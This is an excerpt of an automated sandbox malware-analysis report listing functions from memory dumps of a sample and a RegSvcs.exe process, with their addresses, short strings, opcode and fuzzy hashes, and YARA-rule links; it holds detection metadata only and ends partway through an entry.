Instruction ID: 81ca510768627d71a3ed87f3ff122819779f4dbbb96f479cda19f414aeabe3c0
Opcode Fuzzy Hash: d4cce067680a8e1f9bd416dd1d3cd9c6efe48ebbc8b23aa2ea60a00dd3628dc9
Instruction Fuzzy Hash: 32F18121E0DE4A9FEB8AEA284459774BBE1FF65791F0901FAD00DC71C7CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489E5AB9 Relevance: 7.7, Strings: 6, Instructions: 154COMMON

Download Yara Rule

Strings

8TFN, xrefs: 00007FF8489E5BC8
8TFN, xrefs: 00007FF8489E5B80
8TFN, xrefs: 00007FF8489E5BAD
8TFN, xrefs: 00007FF8489E5B11
8TFN, xrefs: 00007FF8489E5B28
8TFN, xrefs: 00007FF8489E5AEC

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489E3000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489E3000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489e3000_TypeId.jbxd

Similarity

API ID:
String ID: 8TFN$8TFN$8TFN$8TFN$8TFN$8TFN
API String ID: 0-4032552815
Opcode ID: 1c086046fc209ef9ef6340ff5f00b8d0817dec9971b2fc6148d01f3141587f3f
Instruction ID: 0f49b9157a0c9a6753652d07531a9a9e75437381414a3166d3b5f47492512bc3
Opcode Fuzzy Hash: 1c086046fc209ef9ef6340ff5f00b8d0817dec9971b2fc6148d01f3141587f3f
Instruction Fuzzy Hash: 7041A031A0DE894FD79AEB298458774BFA1EF96352B5800FBC409CB1D3CB2AA855C750

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B636D Relevance: 6.7, Strings: 5, Instructions: 482COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: a2a56f8c05100b0e90ab49ac52a605c8f6e49f038822b22548d8355beeed1933
Instruction ID: 501d63409a0e6519a6156b42dd6505b2034e1ab9c98b78f426949bf5ef078ac6
Opcode Fuzzy Hash: a2a56f8c05100b0e90ab49ac52a605c8f6e49f038822b22548d8355beeed1933
Instruction Fuzzy Hash: F4F18121E0DE4A9FEB9AEA284419774BBE1FF65791F0901FAD00DC71C7CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B63E8 Relevance: 6.7, Strings: 5, Instructions: 480COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: f5fa9c505c760653b88156a4a2b857dd837d75340369aec53c8b006553342908
Instruction ID: 1992ae014f72f0b9683bb1a179d52ca0604b7191944967a23df8acc38ab0332b
Opcode Fuzzy Hash: f5fa9c505c760653b88156a4a2b857dd837d75340369aec53c8b006553342908
Instruction Fuzzy Hash: 6EF19221E0DE4A9FEB8AEA284459774BBE1FF65791F0901FAD00DC71C3CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6421 Relevance: 6.7, Strings: 5, Instructions: 480COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: ab9025487a2d056496ebffe3a68a346ef36a0cf3639807123450862f78fe6ab8
Instruction ID: 7b9996e1473c075ab3c444c10fa1a46a77dacecc63e0d15f9c7946204d67dfba
Opcode Fuzzy Hash: ab9025487a2d056496ebffe3a68a346ef36a0cf3639807123450862f78fe6ab8
Instruction Fuzzy Hash: AAF19321E0DE4A9FEB8AEA284459774BBE1FF65791F0901FAD00DC71C7CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6477 Relevance: 6.7, Strings: 5, Instructions: 477COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: 2e3e66cba5c5afd4c72a1ca0c3c3b8fb7440e33b48fbda80ec6041acd6e4bcb2
Instruction ID: a2847f47bade853b4f54e2748dc1ab9e73d4bf9d02340995d2f66ca7ad89d946
Opcode Fuzzy Hash: 2e3e66cba5c5afd4c72a1ca0c3c3b8fb7440e33b48fbda80ec6041acd6e4bcb2
Instruction Fuzzy Hash: 86F19321E0DE4A9FEB8AEA284459774BBE1FF65791F0901FAD00DC71C7CE28AC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B630E Relevance: 6.7, Strings: 5, Instructions: 469COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: 355c3cacb58dffd495ac3d99c70ae2986bf24e24d7a5cbb8b99411ad4e2f4014
Instruction ID: a582b0ba4be790fb2cfdf1a6508d6408734db438ded1cfa326e4b326552a902f
Opcode Fuzzy Hash: 355c3cacb58dffd495ac3d99c70ae2986bf24e24d7a5cbb8b99411ad4e2f4014
Instruction Fuzzy Hash: 00F19321E0DE4A9FEB8AEA284419774BBA1FF65791F1901FAD00DC71C7CE28BC858745

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF8489B6457 Relevance: 6.7, Strings: 5, Instructions: 469COMMON

Download Yara Rule

Strings

NFN, xrefs: 00007FF8489B690A
hAFN, xrefs: 00007FF8489B66D7
NFN, xrefs: 00007FF8489B64D6
xAFN, xrefs: 00007FF8489B6638
xAFN, xrefs: 00007FF8489B6599

Memory Dump Source

Source File: 00000002.00000002.2164644865.00007FF8489B4000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF8489B4000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_7ff8489b4000_TypeId.jbxd

Similarity

API ID:
String ID: hAFN$xAFN$xAFN$NFN$NFN
API String ID: 0-3700522513
Opcode ID: 9dad9773ae628294c0d94e8f2826a81cc27308e08e557eb47bf687a105b57450
Instruction ID: a582b0ba4be790fb2cfdf1a6508d6408734db438ded1cfa326e4b326552a902f
Opcode Fuzzy Hash: 9dad9773ae628294c0d94e8f2826a81cc27308e08e557eb47bf687a105b57450
Instruction Fuzzy Hash: 00F19321E0DE4A9FEB8AEA284419774BBA1FF65791F1901FAD00DC71C7CE28BC858745

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegSvcs.exePID: 348, Parent PID: 1248COMMON

Executed Functions

Function 00007FF848AA1B44 Relevance: 2.3, Strings: 1, Instructions: 1052COMMON

Download Yara Rule

Strings

H, xrefs: 00007FF848AA1EF9

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: 892df7c76a4e181d2c09cdc3ae4e4d04bb85c6e936b8dce275ad898b2a2a86a3
Instruction ID: 06c0f701521f611b377b8dd485d9c4fe9174e7a2a42536284d67fa7373e03c15
Opcode Fuzzy Hash: 892df7c76a4e181d2c09cdc3ae4e4d04bb85c6e936b8dce275ad898b2a2a86a3
Instruction Fuzzy Hash: 6252E521F0EF8A1FE395FA2C142A23466D2EF956C5F5901BAC00EC76D6EE5CDC06435A

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7ABD9 Relevance: 1.8, Strings: 1, Instructions: 588COMMON

Download Yara Rule

Strings

v1_H, xrefs: 00007FF848B7AE72

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID: v1_H
API String ID: 0-261957570
Opcode ID: 0d1d4d378e5c729d1649523d9cc9578762c7b5aa05697a8ce241871faa8f0270
Instruction ID: 6744e9a5e6d212f3f41d48b3600ff49a70d9e12e77eb5bec0499d176cd4c7729
Opcode Fuzzy Hash: 0d1d4d378e5c729d1649523d9cc9578762c7b5aa05697a8ce241871faa8f0270
Instruction Fuzzy Hash: A2F12721E0DE4A0FE7DAA72C54552B977E1EF99690F1401BAD00DC76D7EE1C9C824385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7B400 Relevance: 1.4, Strings: 1, Instructions: 189COMMON

Download Yara Rule

Strings

o1_H, xrefs: 00007FF848B7B572

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID: o1_H
API String ID: 0-579616727
Opcode ID: c0ed3a9e9fe5cdfc2845051556468163cbfbe580901bc30d09930872dadfeee3
Instruction ID: de47a2776981d66a9f1fde402fc53e716113cc6f8426a8d2a577c65952633dda
Opcode Fuzzy Hash: c0ed3a9e9fe5cdfc2845051556468163cbfbe580901bc30d09930872dadfeee3
Instruction Fuzzy Hash: A0512431A1CF4A4FE398EA2894A96B573E1FF95304F58057DC44FC3A86DE68BC428780

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7497E Relevance: 1.3, Strings: 1, Instructions: 47COMMON

Download Yara Rule

Strings

C4, xrefs: 00007FF848B74992

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID: C4
API String ID: 0-517045487
Opcode ID: 5faa08137104b141762c2d33d6fb24faa5fd83e880c2da7d6c73d09e0763e2f2
Instruction ID: 463e0a2e130477aa510f1d125d8da279c8f657c16116d622fb617665728fac69
Opcode Fuzzy Hash: 5faa08137104b141762c2d33d6fb24faa5fd83e880c2da7d6c73d09e0763e2f2
Instruction Fuzzy Hash: 8A110E70A0D7868FE345AF2088187AABBB2EF52385F0001BEC05A9B1D3DB782509C718

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7E3D9 Relevance: 1.3, Strings: 1, Instructions: 22COMMON

Download Yara Rule

Strings

I, xrefs: 00007FF848B7E3F6

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID: I
API String ID: 0-3707901625
Opcode ID: e80ca4934c6b26247cb3ddf6bdbc877b64ae8ae20d1648780f36164cf1566adf
Instruction ID: 6a69b03c8d34adc2c1645de698c1a6e15ac2cc915d9b439a022e6865c35c4052
Opcode Fuzzy Hash: e80ca4934c6b26247cb3ddf6bdbc877b64ae8ae20d1648780f36164cf1566adf
Instruction Fuzzy Hash: 93E01A7144F3C08FCB0AEB3488698487FA0AE6721078A40DEC046CF1B3E2298989CB01

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA5E99 Relevance: .6, Instructions: 643COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: a96395f1c4506a5a9fafc490a3baa0669ea7c395337a91c571e2952e21647498
Instruction ID: 82f133f0998d8fc7c51738b5bc5e4b92695ec807be35c90c3b32052cc94ed753
Opcode Fuzzy Hash: a96395f1c4506a5a9fafc490a3baa0669ea7c395337a91c571e2952e21647498
Instruction Fuzzy Hash: 4402B161D0EBC64FE357E67848661746FA1AF526C0F0D00FBC089CB5E3DA999846872B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA6679 Relevance: .5, Instructions: 494COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 845bc27031c789c2c6db04abe6518d1aad01246939093effd5d41e8714615892
Instruction ID: 5bec5492180eb254ed27f65ac410974fb6485e0db633556ccfe31519b6e34382
Opcode Fuzzy Hash: 845bc27031c789c2c6db04abe6518d1aad01246939093effd5d41e8714615892
Instruction Fuzzy Hash: F8D14421F1EE4B4EE9AAF22C002227D51D2EFD97D0F58457AD40DC26CADF9CD802466B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA251F Relevance: .5, Instructions: 489COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 47bebd468643ace3e6fee00dfb0be11d2d29ca422526ebeeea79ed5cbc74cfc6
Instruction ID: c95f74a45642d334e62c0cbc41cf6f1434030a2f2ccce4d4496d38b993ecc2c0
Opcode Fuzzy Hash: 47bebd468643ace3e6fee00dfb0be11d2d29ca422526ebeeea79ed5cbc74cfc6
Instruction Fuzzy Hash: 17D19321F1EE1B0EEAA9F62C101627D12C2FF987D9F540179C40DC36C6EF9CA856426B

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA593E Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 60c4048a61713db52c98665e3ba2e0dc2090a7e873dfbff3e943cb297cc7f5cb
Instruction ID: cee2843d17daaad7e63d86c7a988794e3b340592fdd6668475e168c9455b0f1f
Opcode Fuzzy Hash: 60c4048a61713db52c98665e3ba2e0dc2090a7e873dfbff3e943cb297cc7f5cb
Instruction Fuzzy Hash: 80E1E321B1EB960FE356FAA948677753B90AF55281F0400BAC149CB5D3DF8CA806876F

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B794DC Relevance: .3, Instructions: 282COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0a4ecde74ff5d53566be15a60b71b88f64d0d13ccb2c7dcdceb566ae2cdaf87c
Instruction ID: 4e6540136c7b1f44884f20a85e4b0bf5a7176017b397e145001ea0a42b54d177
Opcode Fuzzy Hash: 0a4ecde74ff5d53566be15a60b71b88f64d0d13ccb2c7dcdceb566ae2cdaf87c
Instruction Fuzzy Hash: CA91E571C0DBCA5FE747AB3448695A97FA0EF16780F0502FED04ACB4E3DA1C69498356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B76AD0 Relevance: .2, Instructions: 224COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 393ad6684248f0d5c0d57e0d75eae92ceab6175f56683374e89a24485bfd9e71
Instruction ID: e83fb9c61959127340826e369ecf987a658c85427aa4c8666adefbbcb1334881
Opcode Fuzzy Hash: 393ad6684248f0d5c0d57e0d75eae92ceab6175f56683374e89a24485bfd9e71
Instruction Fuzzy Hash: 3D712A61D0DAC64FF249B73818266767AA2EF677C0F1840FAC04DCB6D7DE185C498359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA6455 Relevance: .2, Instructions: 222COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7c24bcc88a8d938e3cdc85ff2566ce0d604840ec0b9a711cfcda4f26341a6bf4
Instruction ID: 806662a9a20ab90550905f49d0846ee1fe1d01db8506594b09a7dd2fb2663783
Opcode Fuzzy Hash: 7c24bcc88a8d938e3cdc85ff2566ce0d604840ec0b9a711cfcda4f26341a6bf4
Instruction Fuzzy Hash: F4518121E1EF874FE297F62804222B81A92AF86AD0F5D00BAD04DC7597DF5DD8028766

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B75C3F Relevance: .2, Instructions: 201COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e9035c1394d440bb0a19e820e2ff0eb1dcceb8b50cde1fba2652dd23b8e9ff65
Instruction ID: 4ee37f6a955b89cc7777db15da7981c086494b0c7452d534b8b1a6a1b2063796
Opcode Fuzzy Hash: e9035c1394d440bb0a19e820e2ff0eb1dcceb8b50cde1fba2652dd23b8e9ff65
Instruction Fuzzy Hash: A1710331E0D7859FE748EB3488666AA7BE2EF65350F1440FEC04ACB2D3DE2868458744

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B801B4 Relevance: .2, Instructions: 192COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: d83dc6c179b011f89d38e8b26f879496d904eea1250c9a0935eda781e57205d3
Instruction ID: c986e2c417a0fb2a110a4c69e14ee968db350fc45ddf5d0d1f5f67c6cd6ac0b3
Opcode Fuzzy Hash: d83dc6c179b011f89d38e8b26f879496d904eea1250c9a0935eda781e57205d3
Instruction Fuzzy Hash: 53610831A0EAC54FE349FB2844296A97BE1EF6A380F1400FED08EDB5D7DE685C458359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA55E7 Relevance: .2, Instructions: 191COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bf7837618c2b277930e8f6bdada8b97c0b492f7f83810bed6f0d975227a759cc
Instruction ID: c253b2e61ffe97334d2dc4f84227c2bdd33c044b8c5722b8335b5c78f9aec240
Opcode Fuzzy Hash: bf7837618c2b277930e8f6bdada8b97c0b492f7f83810bed6f0d975227a759cc
Instruction Fuzzy Hash: D9518F11F2EF474FF395E69C585737952C6DB98690F484276D00CC368ACE99EC0642AB

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7A1D4 Relevance: .2, Instructions: 173COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b91f99deeaf7eb7ff671ae8265d81b43067cc7ca1767778608ff46af9c428a15
Instruction ID: 62929182a42c2f68100e77bf9bfa670473f137df2f93b395e9cb81231ef260c2
Opcode Fuzzy Hash: b91f99deeaf7eb7ff671ae8265d81b43067cc7ca1767778608ff46af9c428a15
Instruction Fuzzy Hash: 52412331D0DA854FE799FB2848259767B90EF66780F0901FED44ECB6D7DE286C808385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B75CFD Relevance: .2, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: abab6714edbc52fe9629de0ce95d1c68116b5438210b74c2bdef47ec9aaa9dca
Instruction ID: eeeb7fd5072f3b503bb102a1a5b2ecd41e69e10aa64f0e911834cd4730f11547
Opcode Fuzzy Hash: abab6714edbc52fe9629de0ce95d1c68116b5438210b74c2bdef47ec9aaa9dca
Instruction Fuzzy Hash: B151F47190E6C95FD726EB348429EA97FA2DF26380F1841FEC08ACF5D3DA196805C749

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7EC68 Relevance: .1, Instructions: 145COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f25e26d6e3e25804bd6a9af1b2406d11b78a45dd655bc3f86b138e1a099ff456
Instruction ID: 1caf654f2e77d884fed8737dbbb44391bb2e478fca6d423d0ef56f3a98e95d69
Opcode Fuzzy Hash: f25e26d6e3e25804bd6a9af1b2406d11b78a45dd655bc3f86b138e1a099ff456
Instruction Fuzzy Hash: 73411B31E0C6454FE754FB288814A69BBE2EF66B90F0402FED00DDB1D7DE2CA8458799

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7DEA8 Relevance: .1, Instructions: 135COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 915dc696db62fbf41bb63da1a58d0a52755138403ead3de62c11e420ed3a2db7
Instruction ID: cbaccdbf22592aad310f1fc781d8ab6f0dffa7d88c280d13c580f5f0e691badd
Opcode Fuzzy Hash: 915dc696db62fbf41bb63da1a58d0a52755138403ead3de62c11e420ed3a2db7
Instruction Fuzzy Hash: 8641C561E0EA864FE785FB6848256796B91EF5A7C0F0C01FEC04DCB5D7DE1C68484359

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7AE8B Relevance: .1, Instructions: 130COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f66239d61ac9a542051fa717238f5ab9cd3537d319f13057aa35657f61ad37de
Instruction ID: 34250294a939b070ace6adac6624c2ed2917518bd5164d78fe4ec4636f8d56b0
Opcode Fuzzy Hash: f66239d61ac9a542051fa717238f5ab9cd3537d319f13057aa35657f61ad37de
Instruction Fuzzy Hash: CD31D221F0CE5A0FF7D5B62C94192BE67E2EF98A91F0402BAD40DC7297EE185C424385

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA25F0 Relevance: .1, Instructions: 119COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 881d051dcf830b74eb4b6a283914353d18ddd8a108b36179aa1c303bf641ad1d
Instruction ID: a6035f19e66dd22236942291d996c4d0e527ca4fdc577cf5e078490c7e47d3fc
Opcode Fuzzy Hash: 881d051dcf830b74eb4b6a283914353d18ddd8a108b36179aa1c303bf641ad1d
Instruction Fuzzy Hash: 6831C521B0FE0B0FE6A5FA2C105617962D2FF997D5F04017AC40DC3687EFA8A8128356

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7E946 Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 51189e7fd6a9e1abe1d52d8daef16df2a4823ef154ada3f483ac517efa8d0b87
Instruction ID: 5fc725cdb1c4520dc826060c93c51bac57ad0e9fb9f1d4929ad64b25f32caa5c
Opcode Fuzzy Hash: 51189e7fd6a9e1abe1d52d8daef16df2a4823ef154ada3f483ac517efa8d0b87
Instruction Fuzzy Hash: 0841F721E0CA868FF745EB285865675BBD2EFA5780F0801FAD00ECB6C7CF2868858755

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848AA233F Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3423086409.00007FF848AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848AA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848aa0000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 98849e0f2221c9afb935fa15a6cac23d4a170af51660ab4a6f79d47f2f8d3c3e
Instruction ID: b10b968f6495c07eaa03c0026b07cfcbfef6332b268ec1e6d04b1e45f7cdffc2
Opcode Fuzzy Hash: 98849e0f2221c9afb935fa15a6cac23d4a170af51660ab4a6f79d47f2f8d3c3e
Instruction Fuzzy Hash: 9F318121B1EE4A0FE695F62C042623951C2FFD9AC5F594179D00DC37D6EE68D8124366

Uniqueness

Uniqueness Score: -1.00%

Function 00007FF848B7DC49 Relevance: .1, Instructions: 114COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000003.00000002.3426878097.00007FF848B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_3_2_7ff848b70000_RegSvcs.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: eb48ec864ba1ca0bccc7d8d307a18e0cf2719ee579e984127d1d552b724fedfb
